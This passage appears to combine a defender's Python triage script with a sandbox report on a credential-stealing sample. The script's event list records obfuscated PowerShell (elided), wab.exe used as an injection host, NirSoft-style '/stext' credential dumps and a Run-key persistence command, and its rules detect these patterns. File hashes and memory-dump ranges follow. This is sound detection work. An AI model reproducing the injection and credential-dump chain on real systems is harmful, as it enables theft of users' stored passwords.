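    Proc(3488, 2528, PS64, f'"{PS64}" "<obfuscated PowerShell, elided>"'),
    Proc(4208, 3488, r"C:\Windows\system32\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"'),
    Proc(3300, 3488, PS32, f'"{PS32}" "<obfuscated PowerShell, elided>"'),
    Proc(4428, 3300, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"'),
    Proc(3044, 3300, WAB, f'"{WAB}"'),
    Proc(1624, 3044, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    Proc(1412, 1624, r"C:\Windows\SysWOW64\reg.exe", REG_ADD),
    Proc(5072, 3044, WAB, rf'"{WAB}" /stext "{TMP}\nobtnhuqqxsvaxybxuzgbthktkatecctdk"'),
    Proc(856,  3044, WAB, rf'"{WAB}" /stext "{TMP}\nobtnhuqqxsvaxybxuzgbthktkatecctdk"'),
    Proc(2764, 3044, WAB, rf'"{WAB}" /stext "{TMP}\nobtnhuqqxsvaxybxuzgbthktkatecctdk"'),
    Proc(4532, 3044, WAB, rf'"{WAB}" /stext "{TMP}\pqoeos"'),
    Proc(4508, 3044, WAB, rf'"{WAB}" /stext "{TMP}\zltxokpmsn"'),
    Proc(3692, 3044, WAB, rf'"{WAB}" /stext "{TMP}\zltxokpmsn"'),
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.I)
ENV_VAR_RE = re.compile(r"%[^%\s]+%")
STEXT_RE = re.compile(r"(?:^|\s)/stext\s", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def triage(events: list[Proc]) -> dict[str, list[int]]:
    """Return {rule_name: sorted PIDs} for the process-tree pivots described above."""
    by_pid = {p.pid: p for p in events}
    findings: dict[str, list[int]] = {}

    def hit(rule: str, pid: int) -> None:
        findings.setdefault(rule, []).append(pid)

    for p in events:
        parent = by_pid.get(p.ppid)
        me = basename(p.image)
        par = basename(parent.image) if parent else ""
        # 1. script host (wscript/cscript) handing off to PowerShell
        if me == "powershell.exe" and par in ("wscript.exe", "cscript.exe"):
            hit("script_host_spawns_powershell", p.pid)
        # 2. 64-bit PowerShell relaunching itself from SysWOW64 (32-bit shellcode host)
        if (me == par == "powershell.exe" and "syswow64" in p.image.lower()
                and "syswow64" not in parent.image.lower()):
            hit("x64_powershell_spawns_wow64_powershell", p.pid)
        # 3. PowerShell launching wab.exe: the legitimate binary is being used as an injection host
        if me == "wab.exe" and par == "powershell.exe":
            hit("powershell_spawns_wab", p.pid)
        # 4. NirSoft-style "/stext <file>" credential dump, whatever binary carries it
        if STEXT_RE.search(p.cmdline):
            hit("nirsoft_stext_dump", p.pid)
        # 5. Run value of type REG_EXPAND_SZ whose command hides behind an env var
        if (me == "reg.exe" and RUN_KEY_RE.search(p.cmdline)
                and "REG_EXPAND_SZ" in p.cmdline.upper() and ENV_VAR_RE.search(p.cmdline)):
            hit("run_key_expand_sz_envvar", p.pid)
    return {rule: sorted(pids) for rule, pids in findings.items()}

if __name__ == "__main__":
    for rule, pids in triage(EVENTS).items():
        print(f"{rule}: {pids}")
```

Rule 4 keys on the argument rather than the image on purpose: the sample runs the NirSoft tools inside hollowed wab.exe copies, so an image-name allowlist for wab.exe would hide the dump.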
            Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixc22uig.iqd.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk

              Filesize

              4KB

              MD5

              18b6368b183e546a35847ae24b4b2913

              SHA1

              040545f7ac2c987d2a79b5e7f1cf9ab83bd25923

              SHA256

              54c101b6b1241b6a0574a66e5a5b9bddc6c60a4daf7338dba6fe3f65b27382af

              SHA512

              68ba8734016705cd12bf9d7ce41d5c823b2ec6ce9ee1ee7e9da9efcd9c88ef1f1b18148d91ad6a271c7a88d4ca098a99198ca709fcf217f9b1fa18f74c48d698

            • C:\Users\Admin\AppData\Roaming\Droh.Lit

              Filesize

              480KB

              MD5

              1a958060ba3e3de4653959fe2fd1efd5

              SHA1

              c5d3a5646dc5920668f1f61c334c7c7d40c888b5

              SHA256

              268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab

              SHA512

              8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

            • memory/2764-56-0x0000000000400000-0x0000000000478000-memory.dmp

              Filesize

              480KB

            • memory/2764-54-0x0000000000400000-0x0000000000478000-memory.dmp

              Filesize

              480KB

            • memory/2764-52-0x0000000000400000-0x0000000000478000-memory.dmp

              Filesize

              480KB

            • memory/3044-69-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

              Filesize

              100KB

            • memory/3044-70-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

              Filesize

              100KB

            • memory/3044-66-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

              Filesize

              100KB

            • memory/3044-45-0x0000000001E60000-0x0000000004729000-memory.dmp

              Filesize

              40.8MB

            • memory/3300-19-0x0000000005BB0000-0x0000000005C16000-memory.dmp

              Filesize

              408KB

            • memory/3300-36-0x00000000086A0000-0x0000000008C44000-memory.dmp

              Filesize

              5.6MB

            • memory/3300-31-0x00000000067B0000-0x00000000067FC000-memory.dmp

              Filesize

              304KB

            • memory/3300-32-0x0000000007A70000-0x00000000080EA000-memory.dmp

              Filesize

              6.5MB

            • memory/3300-33-0x0000000006730000-0x000000000674A000-memory.dmp

              Filesize

              104KB

            • memory/3300-34-0x00000000074C0000-0x0000000007556000-memory.dmp

              Filesize

              600KB

            • memory/3300-35-0x0000000007450000-0x0000000007472000-memory.dmp

              Filesize

              136KB

            • memory/3300-18-0x0000000005B40000-0x0000000005BA6000-memory.dmp

              Filesize

              408KB

            • memory/3300-29-0x0000000005C20000-0x0000000005F74000-memory.dmp

              Filesize

              3.3MB

            • memory/3300-38-0x0000000008C50000-0x000000000B519000-memory.dmp

              Filesize

              40.8MB

            • memory/3300-15-0x0000000004C90000-0x0000000004CC6000-memory.dmp

              Filesize

              216KB

            • memory/3300-16-0x0000000005300000-0x0000000005928000-memory.dmp

              Filesize

              6.2MB

            • memory/3300-17-0x00000000059A0000-0x00000000059C2000-memory.dmp

              Filesize

              136KB

            • memory/3300-30-0x0000000006220000-0x000000000623E000-memory.dmp

              Filesize

              120KB

            • memory/3488-0-0x00007FFE80CF3000-0x00007FFE80CF5000-memory.dmp

              Filesize

              8KB

            • memory/3488-48-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

              Filesize

              10.8MB

            • memory/3488-40-0x00007FFE80CF3000-0x00007FFE80CF5000-memory.dmp

              Filesize

              8KB

            • memory/3488-39-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

              Filesize

              10.8MB

            • memory/3488-12-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

              Filesize

              10.8MB

            • memory/3488-11-0x00007FFE80CF0000-0x00007FFE817B1000-memory.dmp

              Filesize

              10.8MB

            • memory/3488-1-0x0000021A4F9B0000-0x0000021A4F9D2000-memory.dmp

              Filesize

              136KB

            • memory/3692-61-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB

            • memory/3692-59-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB

            • memory/3692-58-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB

            • memory/4532-53-0x0000000000400000-0x0000000000462000-memory.dmp

              Filesize

              392KB

            • memory/4532-57-0x0000000000400000-0x0000000000462000-memory.dmp

              Filesize

              392KB

            • memory/4532-55-0x0000000000400000-0x0000000000462000-memory.dmp

              Filesize

              392KB